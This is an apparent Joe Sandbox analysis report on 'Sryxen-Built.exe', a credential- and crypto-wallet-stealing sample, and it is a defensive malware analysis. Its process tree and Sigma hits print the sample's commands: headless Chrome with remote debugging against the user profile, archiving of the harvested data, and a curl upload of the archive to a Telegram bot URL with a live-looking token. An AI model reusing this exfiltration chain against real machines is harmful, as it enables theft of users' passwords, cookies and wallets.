Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Sryxen-Built.exe

Overview

General Information

Sample name:Sryxen-Built.exe
Analysis ID:1632714
MD5:839dabb2304f06d4c823907cd3879a6c
SHA1:2adc26c5defb4817242701c3632beb94af9daa56
SHA256:cabcfa250019a3bec5927a8bf657c81a4c6d506d6a1b1afdd124d4ade91db389
Tags:exeuser-BastianHein
Infos:

Detection

Score:84
Range:0 - 100
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
AI detected suspicious PE digital signature
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Execution In Headless Mode
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • Sryxen-Built.exe (PID: 8116 cmdline: "C:\Users\user\Desktop\Sryxen-Built.exe" MD5: 839DABB2304F06D4C823907CD3879A6C)
    • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chrome.exe (PID: 1040 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=25424 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 7216 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --no-pre-read-main-dll --field-trial-handle=2372,i,4177486499501083304,17077047075569281720,262144 --disable-features=PaintHolding --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2380 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • msedge.exe (PID: 8408 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 8640 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=2132,i,1055891612558840755,6060021882091044920,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • powershell.exe (PID: 9132 cmdline: powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • curl.exe (PID: 8296 cmdline: curl -F "chat_id=7129133033" -F "document=@\"C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip\"" -F "caption=DIR: Cryptowallets Games Socials VPN " https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • conhost.exe (PID: 8376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • msedge.exe (PID: 8656 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8948 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7424 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6412 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7360 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6636 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • identity_helper.exe (PID: 2992 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6968 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
    • identity_helper.exe (PID: 2888 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6968 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
    • msedge.exe (PID: 4020 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6768 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 8180 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8640 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2024,i,14210214294222991142,3583806559030474698,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 4276 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6100 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2040,i,17832583879177316522,5632469504734258169,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=25424 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=25424 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu, CommandLine|base64offset|contains: ^i^, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\Sryxen-Built.exe", ParentImage: C:\Users\user\Desktop\Sryxen-Built.exe, ParentProcessId: 8116, ParentProcessName: Sryxen-Built.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=25424 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu, ProcessId: 1040, ProcessName: chrome.exe
Sigma detected: Suspicious Script Execution From Temp Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip", CommandLine: powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Sryxen-Built.exe", ParentImage: C:\Users\user\Desktop\Sryxen-Built.exe, ParentProcessId: 8116, ParentProcessName: Sryxen-Built.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip", ProcessId: 9132, ProcessName: powershell.exe
Sigma detected: Browser Execution In Headless Mode
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=25424 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=25424 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu, CommandLine|base64offset|contains: ^i^, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\Sryxen-Built.exe", ParentImage: C:\Users\user\Desktop\Sryxen-Built.exe, ParentProcessId: 8116, ParentProcessName: Sryxen-Built.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=25424 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu, ProcessId: 1040, ProcessName: chrome.exe
Sigma detected: Browser Started with Remote Debugging
Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=25424 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=25424 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu, CommandLine|base64offset|contains: ^i^, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\Sryxen-Built.exe", ParentImage: C:\Users\user\Desktop\Sryxen-Built.exe, ParentProcessId: 8116, ParentProcessName: Sryxen-Built.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=25424 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu, ProcessId: 1040, ProcessName: chrome.exe
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip", CommandLine: powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Sryxen-Built.exe", ParentImage: C:\Users\user\Desktop\Sryxen-Built.exe, ParentProcessId: 8116, ParentProcessName: Sryxen-Built.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip", ProcessId: 9132, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: curl -F "chat_id=7129133033" -F "document=@\"C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip\"" -F "caption=DIR: Cryptowallets Games Socials VPN " https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument, CommandLine: curl -F "chat_id=7129133033" -F "document=@\"C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip\"" -F "caption=DIR: Cryptowallets Games Socials VPN " https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\curl.exe, NewProcessName: C:\Windows\System32\curl.exe, OriginalFileName: C:\Windows\System32\curl.exe, ParentCommandLine: "C:\Users\user\Desktop\Sryxen-Built.exe", ParentImage: C:\Users\user\Desktop\Sryxen-Built.exe, ParentProcessId: 8116, ParentProcessName: Sryxen-Built.exe, ProcessCommandLine: curl -F "chat_id=7129133033" -F "document=@\"C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip\"" -F "caption=DIR: Cryptowallets Games Socials VPN " https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument, ProcessId: 8296, ProcessName: curl.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip", CommandLine: powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Sryxen-Built.exe", ParentImage: C:\Users\user\Desktop\Sryxen-Built.exe, ParentProcessId: 8116, ParentProcessName: Sryxen-Built.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip", ProcessId: 9132, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Joe Sandbox ML detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F63991F0 Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,CryptUnprotectData,LocalFree,0_2_00007FF6F63991F0
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F6389EA0 std::_Fac_node::_Fac_node,htons,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,send,0_2_00007FF6F6389EA0
Source: Sryxen-Built.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: Sryxen-Built.exe, 00000000.00000003.1307854444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1308113785.0000027300110000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1299378533.00000273000F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdbrppDa source: Sryxen-Built.exe, 00000000.00000003.1319116681.00000273000FF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831State\*` source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\eh source: Sryxen-Built.exe, 00000000.00000003.1319777506.0000027300111000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319763400.0000027300110000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319116681.00000273000FF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319851214.0000027300115000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319623446.000002730010D000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319171512.000002730010B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e, source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\User Data\Local State*tet source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000D1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdb<AppCache133858168207041016.txt source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbe\* source: Sryxen-Built.exe, 00000000.00000003.1323103546.00000273000DA000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1323031792.00000273000C5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1322632976.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1322726283.00000273000D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2a source: Sryxen-Built.exe, 00000000.00000003.1325295799.00000273000DA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ta\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*u source: Sryxen-Built.exe, 00000000.00000003.1319570221.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319806336.00000273000FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*te/ source: Sryxen-Built.exe, 00000000.00000003.1319923806.0000027300111000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319777506.0000027300111000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319763400.0000027300110000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319116681.00000273000FF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319623446.000002730010D000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319171512.000002730010B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e, source: Sryxen-Built.exe, 00000000.00000003.1319570221.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319806336.00000273000FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbO0# source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1323702315.00000273000CB000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1323031792.00000273000C5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1322632976.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319835500.00000273000C6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2te** source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbtManagementSDK\Local Stateages\c5e252 source: Sryxen-Built.exe, 00000000.00000003.1300071369.00000273000DC000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300002033.00000273000D1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ataState source: Sryxen-Built.exe, 00000000.00000003.1303413654.0000027300115000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*{ source: Sryxen-Built.exe, 00000000.00000003.1307854444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1311546341.00000273000FD000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1308537853.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1309645577.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1310376586.00000273000F5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1308865721.00000273000F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbtateanag source: Sryxen-Built.exe, 00000000.00000003.1303981152.00000273000C5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1304546053.00000273000C7000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1302987863.00000273000BE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831Data source: Sryxen-Built.exe, 00000000.00000003.1300184374.00000273000DF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300071369.00000273000DC000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300002033.00000273000D1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831okiese\*f source: Sryxen-Built.exe, 00000000.00000003.1325595785.000002730011B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*2 source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319570221.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319806336.00000273000FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pd source: Sryxen-Built.exe, 00000000.00000003.1303287287.00000273000D5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1302905777.00000273000D3000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300485113.00000273000D5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056E source: Sryxen-Built.exe, 00000000.00000003.1303884807.0000027300116000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\y\* source: Sryxen-Built.exe, 00000000.00000003.1303884807.0000027300112000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1304130127.0000027300112000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ate\*e\*b source: Sryxen-Built.exe, 00000000.00000003.1322456921.0000027300100000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17} source: Sryxen-Built.exe, 00000000.00000003.1319570221.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319806336.00000273000FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State* source: Sryxen-Built.exe, 00000000.00000003.1376698055.00000273002E4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1376905311.00000273002E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 State source: Sryxen-Built.exe, 00000000.00000003.1303413654.0000027300115000.00000004.00000020.00020000.00000000.sdmp
